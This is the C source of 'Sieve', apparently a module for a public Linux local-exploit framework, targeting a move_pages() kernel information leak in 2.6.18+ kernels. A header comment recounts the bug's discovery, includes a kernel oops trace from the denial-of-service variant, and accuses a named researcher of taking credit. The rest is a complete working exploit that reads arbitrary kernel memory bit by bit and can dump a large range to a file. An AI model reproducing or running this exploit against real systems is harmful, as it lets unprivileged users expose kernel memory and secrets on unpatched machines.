/* sieve (because the Linux kernel leaks like one, get it?) Bug NOT discovered by Marcus Meissner of SuSE security This bug was discovered by Ramon de Carvalho Valle in September of 2009 The bug was found via fuzzing, and on Sept 24th I was sent a POC DoS for the bug (but had forgotten about it until now) Ramon's report was sent to Novell's internal bugzilla, upon which some months later Marcus took credit for discovering someone else's bug Maybe he thought he could get away with it ;) Almost ;) greets to pipacs, tavis (reciprocal greets!), cloudburst, and rcvalle! first exploit of 2010, next one will be for a bugclass that has afaik never been exploited on Linux before note that this bug can also cause a DoS like so: Unable to handle kernel paging request at ffffffff833c3be8 RIP: [] new_page_node+0x31/0x48 PGD 203067 PUD 205063 PMD 0 Oops: 0000 [1] SMP Pid: 19994, comm: exploit Not tainted 2.6.18-164.el5 #1 RIP: 0010:[] [] new_page_node+0x31/0x48 RSP: 0018:ffff8100a3c6de50 EFLAGS: 00010246 RAX: 00000000005fae0d RBX: ffff8100028977a0 RCX: 0000000000000013 RDX: ffff8100a3c6dec0 RSI: 0000000000000000 RDI: 00000000000200d2 RBP: 0000000000000000 R08: 0000000000000004 R09: 000000000000003c R10: 0000000000000000 R11: 0000000000000092 R12: ffffc20000077018 R13: ffffc20000077000 R14: ffff8100a3c6df00 R15: ffff8100a3c6df28 FS: 00002b8481125810(0000) GS:ffffffff803c0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b CR2: ffffffff833c3be8 CR3: 000000009562d000 CR4: 00000000000006e0 Process exploit (pid: 19994, threadinfo ffff8100a3c6c000, task ffff81009d8c4080) Stack: ffffffff800dd008 ffffc20000077000 ffffffff800dc87b 0000000000000000 0000000000000000 0000000000000003 ffff810092c23800 0000000000000003 00000000000000ff ffff810092c23800 00007eff6d3dc7ff 0000000000000000 Call Trace: [] migrate_pages+0x8d/0x42b [] new_page_node+0x0/0x48 [] schedule_on_each_cpu+0xda/0xe8 [] sys_move_pages+0x339/0x43d [] tracesys+0xd5/0xe0 Code: 48 8b 14 c5 80 cb 3e 80 48 81 c2 10 3c 00 00 e9 82 29 f3 ff RIP [] new_page_node+0x31/0x48 RSP CR2: ffffffff833c3be8 */ #include #define _GNU_SOURCE #include #include #include #include #include #include "exp_framework.h" #undef MPOL_MF_MOVE #define MPOL_MF_MOVE (1 << 1) int max_numnodes; unsigned long node_online_map; unsigned long node_states; unsigned long our_base; unsigned long totalhigh_pages; #undef __NR_move_pages #ifdef __x86_64__ #define __NR_move_pages 279 #else #define __NR_move_pages 317 #endif /* random notes I took when writing this (all applying to the 64bit case): checking in a bitmap based on node_states[2] or node_states[3] (former if HIGHMEM is not present, latter if it is) each node_state is of type nodemask_t, which is is a bitmap of size MAX_NUMNODES/8 RHEL 5.4 has MAX_NUMNODES set to 64, which makes this 8 bytes in size so the effective base we're working with is either node_states + 16 or node_states + 24 on 2.6.18 it's based off node_online_map node_isset does a test_bit based on this base so our specfic case does: base[ourval / 8] & (1 << (ourval & 7)) all the calculations appear to be signed, so we can both index in the negative and positive direction, based on ourval on 64bit, this gives us a 256MB range above and below our base to grab memory of (by passing in a single page and a single node for each bit we want to leak the value of, we can reconstruct entire bytes) we can determine MAX_NUMNODES by looking up two adjacent numa bitmaps, subtracting their difference, and multiplying by 8 but we don't need to do this */ struct exploit_state *exp_state; char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak"; int get_exploit_state_ptr(struct exploit_state *ptr) { exp_state = ptr; return 0; } int requires_null_page = 0; void addr_to_nodes(unsigned long addr, int *nodes) { int i; int min = 0x80000000 / 8; int max = 0x7fffffff / 8; if ((addr < (our_base - min)) || (addr > (our_base + max))) { fprintf(stdout, "Error: Unable to dump address %p\n", addr); exit(1); } for (i = 0; i < 8; i++) { nodes[i] = ((int)(addr - our_base) << 3) | i; } return; } char *buf; unsigned char get_byte_at_addr(unsigned long addr) { int nodes[8]; int node; int status; int i; int ret; unsigned char tmp = 0; addr_to_nodes(addr, (int *)&nodes); for (i = 0; i < 8; i++) { node = nodes[i]; ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE); if (errno == ENOSYS) { fprintf(stdout, "Error: move_pages is not supported on this kernel.\n"); exit(1); } else if (errno != ENODEV) tmp |= (1 << i); } return tmp; } void menu(void) { fprintf(stdout, "Enter your choice:\n" " [0] Dump via symbol/address with length\n" " [1] Dump entire range to file\n" " [2] Quit\n"); } int trigger(void) { unsigned long addr; unsigned long addr2; unsigned char thebyte; unsigned char choice = 0; char ibuf[1024]; char *p; FILE *f; // get lingering \n getchar(); while (choice != '2') { menu(); fgets((char *)&ibuf, sizeof(ibuf)-1, stdin); choice = ibuf[0]; switch (choice) { case '0': fprintf(stdout, "Enter the symbol or address for the base:\n"); fgets((char *)&ibuf, sizeof(ibuf)-1, stdin); p = strrchr((char *)&ibuf, '\n'); if (p) *p = '\0'; addr = exp_state->get_kernel_sym(ibuf); if (addr == 0) { addr = strtoul(ibuf, NULL, 16); } if (addr == 0) { fprintf(stdout, "Invalid symbol or address.\n"); break; } addr2 = 0; while (addr2 == 0) { fprintf(stdout, "Enter the length of bytes to read in hex:\n"); fscanf(stdin, "%x", &addr2); // get lingering \n getchar(); } addr2 += addr; fprintf(stdout, "Leaked bytes:\n"); while (addr < addr2) { thebyte = get_byte_at_addr(addr); printf("%02x ", thebyte); addr++; } printf("\n"); break; case '1': addr = our_base - 0x10000000; #ifdef __x86_64__ /* our lower bound will cause us to access bad addresses and cause an oops */ if (addr < 0xffffffff80000000) addr = 0xffffffff80000000; #else if (addr < 0x80000000) addr = 0x80000000; else if (addr < 0xc0000000) addr = 0xc0000000; #endif addr2 = our_base + 0x10000000; f = fopen("./kernel.bin", "w"); if (f == NULL) { fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n"); exit(1); } fprintf(stdout, "Dumping to kernel.bin (this will take a while): "); fflush(stdout); while (addr < addr2) { thebyte = get_byte_at_addr(addr); fputc(thebyte, f); if (!(addr % (128 * 1024))) { fprintf(stdout, "."); fflush(stdout); } addr++; } fprintf(stdout, "done.\n"); fclose(f); break; case '2': break; } } return 0; } int prepare(unsigned char *ptr) { int node; int found_gap = 0; int i; int ret; int status; totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages"); node_states = exp_state->get_kernel_sym("node_states"); node_online_map = exp_state->get_kernel_sym("node_online_map"); buf = malloc(4096); /* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table, which will be set for our single node -- this gives us the size of the bitmap */ for (i = 0; i < 512; i++) { node = i; ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE); if (errno == ENOSYS) { fprintf(stdout, "Error: move_pages is not supported on this kernel.\n"); exit(1); } else if (errno == ENODEV) { found_gap = 1; } else if (found_gap == 1) { max_numnodes = i; fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes); break; } } if (node_online_map != 0) our_base = node_online_map; /* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size of each bitmap in the array our base is in the middle of we've taken account for all this */ else if (node_states != 0) our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8))); else { fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n"); exit(1); } return 0; } int post(void) { return 0; }